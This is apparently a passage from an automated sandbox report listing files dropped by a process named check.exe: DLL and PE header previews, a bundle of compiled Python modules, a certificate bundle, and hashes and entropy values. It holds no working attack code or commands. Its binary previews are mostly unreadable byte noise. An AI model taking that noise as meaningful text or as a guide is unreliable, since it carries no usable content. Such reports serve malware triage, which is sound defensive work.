                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........H2.&a.&a.&a..a.&a..'`.&a..%`.&a.."`.&a..'`.&a..#`.&a..'`.&a.'a..&a.."`.&a../`.&a..&`.&a...a.&a..$`.&aRich.&a................PE..d.....g.........." ...).,...<.......)..............................................'.....`.........................................0V..H...xV.......................f.../......x...tG..T............................C..@............@.......T..@....................text....*.......,.................. ..`.rdata..d ...@..."...0..............@..@.data........p.......R..............@....pdata...............V..............@..@.rsrc................Z..............@..@.reloc..x............d..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1394456
                                                                                                                                                                                                            Entropy (8bit):5.531698507573688
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:IW7WpLV6yNLeGQbVz3YQfiBgDPtLwjFx278e6ZQnHS91lqyL+DXUgnxOr+dx5/GO:B7WpLtHa9BHSHAW+dx5/GP05vddD
                                                                                                                                                                                                            MD5:A9CBD0455B46C7D14194D1F18CA8719E
                                                                                                                                                                                                            SHA1:E1B0C30BCCD9583949C247854F617AC8A14CBAC7
                                                                                                                                                                                                            SHA-256:DF6C19637D239BFEDC8CD13D20E0938C65E8FDF340622FF334DB533F2D30FA19
                                                                                                                                                                                                            SHA-512:B92468E71490A8800E51410DF7068DD8099E78C79A95666ECF274A9E9206359F049490B8F60B96081FAFD872EC717E67020364BCFA972F26F0D77A959637E528
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:PK..........!..b.e............_collections_abc.pyc......................................\.....S.r.S.S.K.J.r.J.r. .S.S.K.r.\.".\.\.....5.......r.\.".S.5.......r.S...r.\.".\.5.......r.C./.S.Q.r.S.r.\.".\.".S.5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".0.R%..................5.......5.......5.......r.\.".\.".0.R)..................5.......5.......5.......r.\.".\.".0.R-..................5.......5.......5.......r.\.".\."./.5.......5.......r.\.".\.".\."./.5.......5.......5.......r.\.".\.".\.".S.5.......5.......5.......r.\.".\.".\.".S.S.-...5.......5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".S.5.......5.......r \.".\.".S.5.......5.......r!\.".\.".\"".5.......5.......5.......r#\.".0.R%..................5.......5.......r$\.".0.R)..................5.......5.......r%\.".0.R-..................5.......5.......r&\.".\.RN..................5.......r(S...r)\)".5.......r*C)\.".S...".5.......5.......r+S...r,\,".5.......r,\.".\,5.......r-\,R]..................5.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):299427
                                                                                                                                                                                                            Entropy (8bit):6.047872935262006
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/QRSRqNb7d8iu5Nahx:QWb/TRJLWURrI5RWavdF08/
                                                                                                                                                                                                            MD5:50EA156B773E8803F6C1FE712F746CBA
                                                                                                                                                                                                            SHA1:2C68212E96605210EDDF740291862BDF59398AEF
                                                                                                                                                                                                            SHA-256:94EDEB66E91774FCAE93A05650914E29096259A5C7E871A1F65D461AB5201B47
                                                                                                                                                                                                            SHA-512:01ED2E7177A99E6CB3FBEF815321B6FA036AD14A3F93499F2CB5B0DAE5B713FD2E6955AA05F6BDA11D80E9E0275040005E5B7D616959B28EFC62ABB43A3238F0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10752
                                                                                                                                                                                                            Entropy (8bit):4.818583535960129
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:Mvs10hZd9D74ACb0xx2uKynu10YLsgxwJiUNiL0U5IZsJFPGDtCFCCQAADo+cX6m:MXv9XFCk2z1/t12iwU5usJFuCyPcqgE
                                                                                                                                                                                                            MD5:56FE4F6C7E88212161F49E823CCC989A
                                                                                                                                                                                                            SHA1:16D5CBC5F289AD90AEAA4FF7CB828627AC6D4ACF
                                                                                                                                                                                                            SHA-256:002697227449B6D69026D149CFB220AC85D83B13056C8AA6B9DAC3FD3B76CAA4
                                                                                                                                                                                                            SHA-512:7C9D09CF9503F73E6F03D30E54DBB50606A86D09B37302DD72238880C000AE2B64C99027106BA340753691D67EC77B3C6E5004504269508F566BDB5E13615F1E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k............r_...........r................................................3..........Rich....................PE..d....$.g.........." ...).....................................................p............`..........................................'..p...`(..d....P.......@...............`..,...`#.............................. "..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):124928
                                                                                                                                                                                                            Entropy (8bit):5.953784637413928
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:JDE+0ov6ojgN3qN8h51Zlh+YW5E38vCsmLS:JdefPZE2ICDLS
                                                                                                                                                                                                            MD5:10116447F9276F10664BA85A5614BA3A
                                                                                                                                                                                                            SHA1:EFD761A3E6D14E897D37AFB0C7317C797F7AE1D6
                                                                                                                                                                                                            SHA-256:C393098E7803ABF08EE8F7381AD7B0F8FAFFBF66319C05D72823308E898F8CFC
                                                                                                                                                                                                            SHA-512:C04461E52B7FE92D108CBDEB879B7A8553DD552D79C88DFA3F5D0036EED8D4B8C839C0BF2563BC0C796F8280ED2828CA84747CB781D2F26B44214FCA2091EAE4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y.....................7...............7.......7.......7.......6..........D....6.......6.......6.......6......Rich............................PE..d....$.g.........." ...).@...........C.......................................0............`.........................................0...d.................................... ......................................P...@............P...............................text....?.......@.................. ..`.rdata..nY...P...Z...D..............@..@.data....=.......0..................@....pdata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5232408
                                                                                                                                                                                                            Entropy (8bit):5.940072183736028
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:98304:/V+Qs2NuR5YV0L8PQ1CPwDvt3uFlDC4SC9c:9rs2NuDYV0L841CPwDvt3uFlDC4SCa
                                                                                                                                                                                                            MD5:123AD0908C76CCBA4789C084F7A6B8D0
                                                                                                                                                                                                            SHA1:86DE58289C8200ED8C1FC51D5F00E38E32C1AAD5
                                                                                                                                                                                                            SHA-256:4E5D5D20D6D31E72AB341C81E97B89E514326C4C861B48638243BDF0918CFA43
                                                                                                                                                                                                            SHA-512:80FAE0533BA9A2F5FA7806E86F0DB8B6AAB32620DDE33B70A3596938B529F3822856DE75BDDB1B06721F8556EC139D784BC0BB9C8DA0D391DF2C20A80D33CB04
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._~.._~.._~..V.S.M~.....]~.....[~.....W~.....S~.._~...~......T~..J....~..J...7}..J...^~..J.?.^~..J...^~..Rich_~..........................PE..d......f.........." ...(..7..<......v........................................0P.......O...`...........................................H.0.....O.@....@O.|.... L. .....O../...PO.$...`{D.8............................yD.@.............O..............................text.....7.......7................. ..`.rdata........7.......7.............@..@.data...Ao....K..<....K.............@....pdata....... L.......K.............@..@.idata...%....O..&....N.............@..@.00cfg..u....0O.......N.............@..@.rsrc...|....@O.......N.............@..@.reloc..~....PO.......N.............@..B................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):39696
                                                                                                                                                                                                            Entropy (8bit):6.641880464695502
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
                                                                                                                                                                                                            MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                                                                                                                                                                                                            SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                                                                                                                                                                                                            SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                                                                                                                                                                                                            SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):792856
                                                                                                                                                                                                            Entropy (8bit):5.57949182561317
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:7LN1sdyIzHHZp5c3nlUa6lxzAG11rbmFe9Xbv:7LgfzH5I3nlUa2AU2Fe9Xbv
                                                                                                                                                                                                            MD5:4FF168AAA6A1D68E7957175C8513F3A2
                                                                                                                                                                                                            SHA1:782F886709FEBC8C7CEBCEC4D92C66C4D5DBCF57
                                                                                                                                                                                                            SHA-256:2E4D35B681A172D3298CAF7DC670451BE7A8BA27C26446EFC67470742497A950
                                                                                                                                                                                                            SHA-512:C372B759B8C7817F2CBB78ECCC5A42FA80BDD8D549965BD925A97C3EEBDCE0335FBFEC3995430064DEAD0F4DB68EBB0134EB686A0BE195630C49F84B468113E3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.>..|m..|m..|m.u.m..|m+.}l..|m.u}l..|m+..l..|m+.xl..|m+.yl..|m..}l..|m..}m..|m..xl..|m..|l..|m...m..|m..~l..|mRich..|m................PE..d......f.........." ...(.>..........K........................................0......!+....`..........................................x...Q..............s.... ...M......./......d...p...8...............................@............................................text....<.......>.................. ..`.rdata..hz...P...|...B..............@..@.data...qN.......H..................@....pdata..pV... ...X..................@..@.idata...c.......d...^..............@..@.00cfg..u...........................@..@.rsrc...s...........................@..@.reloc..C...........................@..B........................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):67072
                                                                                                                                                                                                            Entropy (8bit):5.909456553599775
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:j3sHmR02IvVxv7WCyKm7c5Th4JBHTOvyyaZE:jnIvryCyKx5Th4J5OvyyO
                                                                                                                                                                                                            MD5:49AC12A1F10AB93FAFAB064FD0523A63
                                                                                                                                                                                                            SHA1:3AD6923AB0FB5D3DD9D22ED077DB15B42C2FBD4F
                                                                                                                                                                                                            SHA-256:BA033B79E858DBFCBA6BF8FB5AFE10DEFD1CB03957DBBC68E8E62E4DE6DF492D
                                                                                                                                                                                                            SHA-512:1BC0F50E0BB0A9D9DDDAD31390E5C73B0D11C2B0A8C5462065D477E93FF21F7EDC7AA2B2B36E478BE0A797A38F43E3FBEB6AAABEF0BADEC1D8D16EB73DF67255
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......nT..*5..*5..*5..#M2. 5..x@..(5..x@..&5..x@.."5..x@...5...k..(5..aM..;5..*5...5...@..:5...@..+5...@^.+5...@..+5..Rich*5..................PE..d...._.g.........." .........h......\........................................@............`.........................................0...`.......@.... .......................0..(.......................................8............................................text...h........................... ..`.rdata..\I.......J..................@..@.data...x...........................@....pdata..............................@..@.rsrc........ ......................@..@.reloc..(....0......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):70416
                                                                                                                                                                                                            Entropy (8bit):6.1258200129869405
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:pQEotsskOv6pWVCB4p/uKlZPRQcFIc9qunV0Jku/YFI1Hu1wEBbCpVNyD6VdPxiD:/otssyKcunV8PjZIJy0i7SyWH1
                                                                                                                                                                                                            MD5:16855EBEF31C5B1EBE767F1C617645B3
                                                                                                                                                                                                            SHA1:315521F3A748ABFA35CD4D48E8DD09D0556D989B
                                                                                                                                                                                                            SHA-256:A5C6A329698490A035133433928D04368CE6285BB91A9D074FC285DE4C9A32A4
                                                                                                                                                                                                            SHA-512:C3957B3BD36B10C7AD6EA1FF3BC7BD65CDCEB3E6B4195A25D0649AA0DA179276CE170DA903D77B50A38FC3D5147A45BE32DBCFDBFBF76CC46301199C529ADEA4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%?..a^e.a^e.a^e.).m.`^e.).e.`^e.)..`^e.).g.`^e.Richa^e.........PE..d......g.........." ...)............................................................z.....`.........................................`..................................../..............T............................................................................rdata..............................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6083856
                                                                                                                                                                                                            Entropy (8bit):6.126922729922386
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:fXGc3O7T4DKX+vLFMmKYxiAYNBD987KdJlI9HbeX2jrgQcw6Zc4h67mM+XDQ3bLi:Of42zJiwJl/YF7v3vaHDMiEN3Kr
                                                                                                                                                                                                            MD5:B9DE917B925DD246B709BB4233777EFD
                                                                                                                                                                                                            SHA1:775F258D8B530C6EA9F0DD3D1D0B61C1948C25D2
                                                                                                                                                                                                            SHA-256:0C0A66505093B6A4BB3475F716BD3D9552095776F6A124709C13B3F9552C7D99
                                                                                                                                                                                                            SHA-512:F4BF3398F50FDD3AB7E3F02C1F940B4C8B5650ED7AF16C626CCD1B934053BA73A35F96DA03B349C1EB614BB23E0BC6B5CC58B07B7553A5C93C6D23124F324A33
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s]{v ]{v ]{v M.w!_{v M.. S{v M.u!Y{v M.r!U{v M.s!P{v T.. G{v ..w!V{v ]{w .zv ..{!.{v ..v!\{v ... \{v ..t!\{v Rich]{v ........................PE..d......g.........." ...).:+..T9......J........................................d.....uF]...`...........................................O.....h.P.......d......0].......\../....d..... A3.T.....................I.(....?3.@............P+..............................text....8+......:+................. ..`.rdata....%..P+...%..>+.............@..@.data...$9....P..N....P.............@....pdata.......0]...... U.............@..@PyRuntim.N...._..P....W.............@....rsrc.........d.......[.............@..@.reloc........d.......[.............@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):30992
                                                                                                                                                                                                            Entropy (8bit):6.554484610649281
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:7hhxm9tKLhuoNHfzzlvFy0ZZIJ9GckHQIYiSy1pCQ4HWSJIVE8E9VF0Ny6sC:tCytHf98uZIJ9Gx5YiSyvy2ES
                                                                                                                                                                                                            MD5:20831703486869B470006941B4D996F2
                                                                                                                                                                                                            SHA1:28851DFD43706542CD3EF1B88B5E2749562DFEE0
                                                                                                                                                                                                            SHA-256:78E5994C29D8851F28B5B12D59D742D876683AEA58ECEEA1FB895B2036CDCDEB
                                                                                                                                                                                                            SHA-512:4AAF5D66D2B73F939B9A91E7EDDFEB2CE2476C625586EF227B312230414C064AA850B02A4028363AA4664408C9510594754530A6D026A0A84BE0168D677C1BC4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........tV..'V..'V..'_.j'T..'F:.&T..'F:.&R..'F:.&^..'F:.&Z..'.;.&T..'V..'...'...&S..'.;.&W..'.;.&W..'.;.'W..'.;.&W..'RichV..'................PE..d.....g.........." ...).....2............................................................`..........................................@..L...<A..x....p.......`.......J.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...p....P.......8..............@....pdata.......`.......:..............@..@.rsrc........p.......>..............@..@.reloc..L............H..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):709904
                                                                                                                                                                                                            Entropy (8bit):5.861739047785334
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:FYGdLI/X77mvfldCKGihH32W3cnPSqrUgLIe:FYGW7qNxr3cnPXLIe
                                                                                                                                                                                                            MD5:0902D299A2A487A7B0C2D75862B13640
                                                                                                                                                                                                            SHA1:04BCBD5A11861A03A0D323A8050A677C3A88BE13
                                                                                                                                                                                                            SHA-256:2693C7EE4FBA55DC548F641C0CB94485D0E18596FFEF16541BD43A5104C28B20
                                                                                                                                                                                                            SHA-512:8CBEF5A9F2D24DA1014F8F1CCBDDD997A084A0B04DD56BCB6AC38DDB636D05EF7E4EA7F67A085363AAD3F43D45413914E55BDEF14A662E80BE955E6DFC2FECA3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q.............(.....(.....(.....(.....)................).....).....)x....)....Rich..................PE..d.....g.........." ...).B...f......P,..............................................<.....`.........................................P...X................................/..........p...T...........................0...@............`..h............................text....@.......B.................. ..`.rdata...?...`...@...F..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):590112
                                                                                                                                                                                                            Entropy (8bit):6.461874649448891
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:xI88L4Wu4+oJ+xc39ax5Ms4ETs3rxSvYcRkdQEKZm+jWodEEVh51:xD89rxZfQEKZm+jWodEEP5
                                                                                                                                                                                                            MD5:01B946A2EDC5CC166DE018DBB754B69C
                                                                                                                                                                                                            SHA1:DBE09B7B9AB2D1A61EF63395111D2EB9B04F0A46
                                                                                                                                                                                                            SHA-256:88F55D86B50B0A7E55E71AD2D8F7552146BA26E927230DAF2E26AD3A971973C5
                                                                                                                                                                                                            SHA-512:65DC3F32FAF30E62DFDECB72775DF870AF4C3A32A0BF576ED1AAAE4B16AC6897B62B19E01DC2BF46F46FBE3F475C061F79CBE987EDA583FEE1817070779860E5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........LS..-=..-=..-=.....-=..U...-=..-<.k-=.gB<..-=.gB9..-=.gB>..-=.gB8.=-=.gB=..-=.gB..-=.gB?..-=.Rich.-=.........PE..d.....t^.........." .....@..........."...............................................z....`A.........................................j..h....D..,...............L;...... A......(...@...8...............................0............P.......f..@....................text...,>.......@.................. ..`.rdata..r....P.......D..............@..@.data....:...`..."...N..............@....pdata..L;.......<...p..............@..@.didat..h...........................@....rsrc...............................@..@.reloc..(...........................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):31728
                                                                                                                                                                                                            Entropy (8bit):6.499754548353504
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:rOY/H1SbuIqnX8ndnWc95gW3C8c+pBj0HRN7bULkcyHRN7rxTO6iuQl9xiv:yYIBqnMdxxWd4urv
                                                                                                                                                                                                            MD5:0FE6D52EB94C848FE258DC0EC9FF4C11
                                                                                                                                                                                                            SHA1:95CC74C64AB80785F3893D61A73B8A958D24DA29
                                                                                                                                                                                                            SHA-256:446C48C1224C289BD3080087FE15D6759416D64F4136ADDF30086ABD5415D83F
                                                                                                                                                                                                            SHA-512:C39A134210E314627B0F2072F4FFC9B2CE060D44D3365D11D8C1FE908B3B9403EBDD6F33E67D556BD052338D0ED3D5F16B54D628E8290FD3A155F55D36019A86
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......>.{.zl..zl..zl......xl..s...~l.....}l.....xl..zl..Ql......l.....il.....{l.....{l.....{l..Richzl..................PE..d.....t^.........." .........$......p.....................................................`A........................................p>..L....?..x....p.......`..X....:...A......p...P3..8............................3..0............0..@............................text............................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata..X....`.......0..............@..@.rsrc........p.......4..............@..@.reloc..p............8..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6023664
                                                                                                                                                                                                            Entropy (8bit):6.768988071491288
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:98304:hcirJylHYab/6bMJsv6tWKFdu9CLiZxqfg8gwf:+irJylHFb/QMJsv6tWKFdu9CL4xqfg8x
                                                                                                                                                                                                            MD5:817520432A42EFA345B2D97F5C24510E
                                                                                                                                                                                                            SHA1:FEA7B9C61569D7E76AF5EFFD726B7FF6147961E5
                                                                                                                                                                                                            SHA-256:8D2FF4CE9096DDCCC4F4CD62C2E41FC854CFD1B0D6E8D296645A7F5FD4AE565A
                                                                                                                                                                                                            SHA-512:8673B26EC5421FCE8E23ADF720DE5690673BB4CE6116CB44EBCC61BBBEF12C0AD286DFD675EDBED5D8D000EFD7609C81AAE4533180CF4EC9CD5316E7028F7441
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......D.............................UJ......................................................W.....,..................r....................Rich............PE..d...;._.........." ..........-.......-......................................`\.....x.\...`...........................................L..O....T...... \.......U.. ....[......0\..%..,.H.T.....................H.(.....H.0............./.H............................text............................... ..`.rdata..F7%.../..8%.................@..@.data...x....PT..\...6T.............@....pdata... ....U.."....T.............@..@.qtmimed.....0W.......V.............@..P.rsrc........ \.......[.............@..@.reloc...%...0\..&....[.............@..B........................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):436720
                                                                                                                                                                                                            Entropy (8bit):6.392610185061176
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:ZLvnUJ17UTGOkWHUe/W9TgYMDu96ixMZQ8IlXbKgp8aIDeN:KP7cGOGegTwu96ixMZQtlrPN
                                                                                                                                                                                                            MD5:0E8FF02D971B61B5D2DD1AC4DF01AE4A
                                                                                                                                                                                                            SHA1:638F0B46730884FA036900649F69F3021557E2FE
                                                                                                                                                                                                            SHA-256:1AA70B106A10C86946E23CAA9FC752DC16E29FBE803BBA1F1AB30D1C63EE852A
                                                                                                                                                                                                            SHA-512:7BA616EDE66B16D9F8B2A56C3117DB49A74D59D0D32EAA6958DE57EAC78F14B1C7F2DBBA9EAE4D77937399CF14D44535531BAF6F9DB16F357F8712DFAAE4346A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D..*..*..*.....*...+..*.../..*.......*...)..*...+..*.O.+..*..+...*.O./..*.O.*..*.O....*.....*.O.(..*.Rich.*.........................PE..d...]._.........." .....\...<.......\..............................................K.....`..........................................h..to...................`...Q..............4.......T.......................(...`...0............p...............................text...yZ.......\.................. ..`.rdata..0....p.......`..............@..@.data...X....@......."..............@....pdata...Q...`...R...2..............@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7008240
                                                                                                                                                                                                            Entropy (8bit):6.674290383197779
                                                                                                                                                                                                            Encrypted:false
